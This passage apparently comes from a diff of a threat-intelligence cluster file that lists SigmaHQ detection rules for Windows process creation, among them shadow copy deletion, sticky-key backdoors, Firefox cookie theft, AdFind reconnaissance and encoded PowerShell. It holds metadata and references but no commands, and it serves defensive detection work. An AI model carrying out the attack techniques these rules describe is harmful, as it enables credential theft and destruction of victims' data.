(start) via system utilities.", - "uuid": "2a072a96-a086-49fa-bcb5-15cc5a619093", - "value": "Service Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2019/10/21", - "filename": "proc_creation_win_service_execution.yml", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administrator or user executes a service for legitimate reasons." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a windows service to be stopped", - "uuid": "eb87818d-db5d-49cc-a987-d5da331fbd90", - "value": "Stop Windows Service", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_stop.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ], - "creation_date": "2019/10/23", - "filename": "proc_creation_win_service_stop.yml", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", - "level": "low", - "falsepositive": [ - "Administrator shutting down the service due to upgrade or removal purposes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of executionpolicy option to set insecure policies", - "uuid": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", - "value": "Change PowerShell Policies to an Insecure Level", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", - "https://adsecurity.org/?p=2604", - "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2021/11/01", - "filename": "proc_creation_win_set_policies_to_unsecure_level.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Administrator script" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "uuid": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", - "value": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", - "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadowcopy_deletion_via_powershell.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2022/09/20", - "filename": "proc_creation_win_shadowcopy_deletion_via_powershell.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "uuid": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "value": "Shadow Copies Access via Symlink", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_access_symlink.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" - ], - "creation_date": "2019/10/22", - "filename": "proc_creation_win_shadow_copies_access_symlink.yml", - "author": "Teymur Kheirkhabarov, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administrator working with shadow copies, access for backup purposes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Shadow Copies creation using operating systems utilities, possible credential access", - "uuid": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", - "value": "Shadow Copies Creation Using Operating Systems Utilities", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_creation.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.002", - "attack.t1003.003" - ], - "creation_date": "2019/10/22", - "filename": "proc_creation_win_shadow_copies_creation.yml", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administrator working with shadow copies, access for backup purposes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Shadow Copies deletion using operating systems utilities", - "uuid": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "value": "Shadow Copies Deletion Using Operating Systems Utilities", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://blog.talosintelligence.com/2017/05/wannacry.html", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", - "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", - "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", - "https://github.com/Neo23x0/Raccine#the-process", - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", - "https://redcanary.com/blog/intelligence-insights-october-2021/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" - ], - "creation_date": "2019/10/22", - "filename": "proc_creation_win_shadow_copies_deletion.yml", - "author": "Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", - "level": "high", - "falsepositive": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "uuid": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", - "value": "SharpUp PrivEsc Tool", - "meta": { - "refs": [ - "https://github.com/GhostPack/SharpUp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharpup.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" - ], - "creation_date": "2022/08/20", - "filename": "proc_creation_win_sharpup.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the Sharp Chisel via the commandline arguments", - "uuid": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", - "value": "SharpChisel Usage", - "meta": { - "refs": [ - "https://github.com/shantanu561993/SharpChisel", - "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090.001" - ], - "creation_date": "2022/09/05", - "filename": "proc_creation_win_sharp_chisel_usage.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Some false positives may occure with other tools with similar commandlines" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", - "uuid": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", - "value": "Shells Spawned by Java", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_by_java.yml" - ], - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ], - "creation_date": "2021/12/17", - "filename": "proc_creation_win_shell_spawn_by_java.yml", - "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate calls to system binaries", - "Company specific internal usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious child process of a Windows shell", - "uuid": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", - "value": "Windows Shell Spawning Suspicious Program", - "meta": { - "refs": [ - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.005", - "attack.t1059.001", - "attack.t1218" - ], - "creation_date": "2018/04/06", - "filename": "proc_creation_win_shell_spawn_susp_program.yml", - "author": "Florian Roth, Tim Shelton", - "level": "high", - "falsepositive": [ - "Administrative scripts", - "Microsoft SCCM" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects SILENTTRINITY stager use", - "uuid": "03552375-cc2c-4883-bbe4-7958d5a980be", - "value": "SILENTTRINITY Stager Execution", - "meta": { - "refs": [ - "https://github.com/byt3bl33d3r/SILENTTRINITY", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_silenttrinity_stage_use.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071" - ], - "creation_date": "2019/10/22", - "filename": "proc_creation_win_silenttrinity_stage_use.yml", - "author": "Aleksey Potapov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "uuid": "e13f668e-7f95-443d-98d2-1816a7648a7b", - "value": "Detected Windows Software Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", - "https://github.com/harleyQu1nn/AggressorScripts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518" - ], - "creation_date": "2020/10/16", - "filename": "proc_creation_win_software_discovery.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect attacker collecting audio via SoundRecorder application.", - "uuid": "83865853-59aa-449e-9600-74b9d89a6d6e", - "value": "Audio Capture via SoundRecorder", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", - "https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_soundrec_audio_capture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1123" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_soundrec_audio_capture.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate audio capture by legitimate user." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Service Principal Name Enumeration used for Kerberoasting", - "uuid": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", - "value": "Possible SPN Enumeration", - "meta": { - "refs": [ - "https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_spn_enum.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ], - "creation_date": "2018/11/14", - "filename": "proc_creation_win_spn_enum.yml", - "author": "Markus Neis, keepwatch", - "level": "medium", - "falsepositive": [ - "Administrator Activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects dump of credentials in VeeamBackup dbo", - "uuid": "b57ba453-b384-4ab9-9f40-1038086b4e53", - "value": "VeeamBackup Database Credentials Dump", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" - ], - "tags": [ - "attack.collection", - "attack.t1005" - ], - "creation_date": "2021/12/20", - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of sqlite binary to query the Firefox cookies.sqlite database and steal the cookie data contained within it", - "uuid": "4833155a-4053-4c9c-a997-777fcea0baa7", - "value": "SQLite Firefox Cookie DB Access", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_cookies.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1539" - ], - "creation_date": "2022/04/08", - "filename": "proc_creation_win_sqlite_firefox_cookies.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "uuid": "2fdefcb3-dbda-401e-ae23-f0db027628bc", - "value": "Sticky Key Like Backdoor Usage", - "meta": { - "refs": [ - "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" - ], - "creation_date": "2018/03/15", - "filename": "proc_creation_win_stickykey_like_backdoor.yml", - "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "uuid": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", - "value": "Sticky-Key Backdoor Copy Cmd.exe", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html", - "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml" - ], - "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" - ], - "creation_date": "2020/02/18", - "filename": "proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "uuid": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", - "value": "Execution via stordiag.exe", - "meta": { - "refs": [ - "https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html", - "https://twitter.com/eral4m/status/1451112385041911809", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stordiag_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/10/21", - "filename": "proc_creation_win_stordiag_execution.yml", - "author": "Austin Songer (@austinsonger)", - "level": "high", - "falsepositive": [ - "Legitimate usage of stordiag.exe." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", - "uuid": "16905e21-66ee-42fe-b256-1318ada2d770", - "value": "Start of NT Virtual DOS Machine", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", - "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", - "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", - "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/07/16", - "filename": "proc_creation_win_susp_16bit_application.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of 3proxy, a tiny free proxy server", - "uuid": "f38a82d2-fba3-4781-b549-525efbec8506", - "value": "3Proxy Usage", - "meta": { - "refs": [ - "https://github.com/3proxy/3proxy", - "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572" - ], - "creation_date": "2022/09/13", - "filename": "proc_creation_win_susp_3proxy_usage.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "uuid": "9fbf5927-5261-4284-a71d-f681029ea574", - "value": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7z.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2021/07/27", - "filename": "proc_creation_win_susp_7z.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Command line parameter combinations that contain all included strings" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious 7zip execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", - "uuid": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", - "value": "7Zip Compressing Dump Files", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_susp_7zip_dmp.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate use of 7-Zip with a command line in which .dmp appears accidentally" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", - "uuid": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", - "value": "Add User to Local Administrators", - "meta": { - "refs": [ - "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2022/08/12", - "filename": "proc_creation_win_susp_add_local_admin.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", - "uuid": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "value": "Suspicious Add User to Remote Desktop Users Group", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml" - ], - "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" - ], - "creation_date": "2021/12/06", - "filename": "proc_creation_win_susp_add_user_remote_desktop.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of a AdFind for enumeration based on it's commadline flags", - "uuid": "455b9d50-15a1-4b99-853f-8d37655a4c1b", - "value": "Suspicious AdFind Enumeration", - "meta": { - "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002" - ], - "creation_date": "2021/12/13", - "filename": "proc_creation_win_susp_adfind_enumeration.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", - "uuid": "9a132afa-654e-11eb-ae93-0242ac130002", - "value": "AdFind Usage Detection", - "meta": { - "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", - "https://thedfirreport.com/2020/05/08/adfind-recon/", - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", - "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_usage.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" - ], - "creation_date": "2021/02/02", - "filename": "proc_creation_win_susp_adfind_usage.yml", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate admin activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", - "uuid": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", - "value": "Suspicious Execution of Adidnsdump", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adidnsdump.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018" - ], - "creation_date": "2022/01/01", - "filename": "proc_creation_win_susp_adidnsdump.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of AdvancedRun utility", - "uuid": "d2b749ee-4225-417e-b20e-a8d2193cbb84", - "value": "Suspicious AdvancedRun Execution", - "meta": { - "refs": [ - "https://twitter.com/splinter_code/status/1483815103279603714", - "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", - "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/20", - "filename": "proc_creation_win_susp_advancedrun.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", - "uuid": "fa00b701-44c6-4679-994d-5a18afa8a707", - "value": "Suspicious AdvancedRun Runas Priv User", - "meta": { - "refs": [ - "https://twitter.com/splinter_code/status/1483815103279603714", - "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", - "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/20", - "filename": "proc_creation_win_susp_advancedrun_priv_user.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "uuid": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", - "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_athremotefxvgpudisablementcommand.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/07/13", - "filename": "proc_creation_win_susp_athremotefxvgpudisablementcommand.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects base64 encoded powershell 'Invoke-' call", - "uuid": "6385697e-9f1b-40bd-8817-f4a91f40508e", - "value": "Suspicious Base64 Encoded Powershell Invoke", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2022/05/20", - "filename": "proc_creation_win_susp_base64_invoke.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "uuid": "9c0295ce-d60d-40bd-bd74-84673b7592b1", - "value": "Suspicious Encoded Obfuscated LOAD String", - "meta": { - "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2022/03/01", - "filename": "proc_creation_win_susp_base64_load.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects, possibly, malicious unauthorized usage of bcdedit.exe", - "uuid": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", - "value": "Possible Ransomware or Unauthorized MBR Modifications", - "meta": { - 